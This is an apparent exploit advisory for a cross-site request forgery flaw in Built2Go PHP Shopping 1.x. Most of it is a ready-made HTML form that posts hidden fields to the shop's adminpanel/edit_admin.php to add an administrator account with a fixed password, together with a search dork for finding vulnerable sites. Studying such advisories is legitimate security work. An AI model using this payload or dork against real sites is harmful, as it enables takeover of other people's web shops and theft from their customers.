Built2Go PHP Shopping 1.x Cross Site Request Forgery

`Built2Go PHP Shopping v 1.x – CSRF Vulnerability(add admin)  
====================================================================  
  
####################################################################  
.:. Author : AtT4CKxT3rR0r1ST  
.:. Contact : [[email protected]] , [[email protected]]  
.:. Home : http://www.iphobos.com/blog/  
.:. Script : http://www.built2go.com/  
.:. Dork : “Powered by Built2Go PHP Shopping”  
####################################################################  
  
===[ Exploit ]===  
  
<form method=”POST” name=”form0″ action=”  
http://SITE/adminpanel/edit_admin.php”>  
<input type=”hidden” name=”userid” value=”ADMIN”/>  
<input type=”hidden” name=”pass” value=”12121212″/>  
<input type=”hidden” name=”retypepass” value=”12121212″/>  
<input type=”hidden” name=”addnew” value=”1″/>  
<input type=”hidden” name=”action” value=”save”/>  
<input type=”hidden” name=”new” value=”Submit”/>  
</form>  
  
</body>  
</html>  
  
####################################################################  
`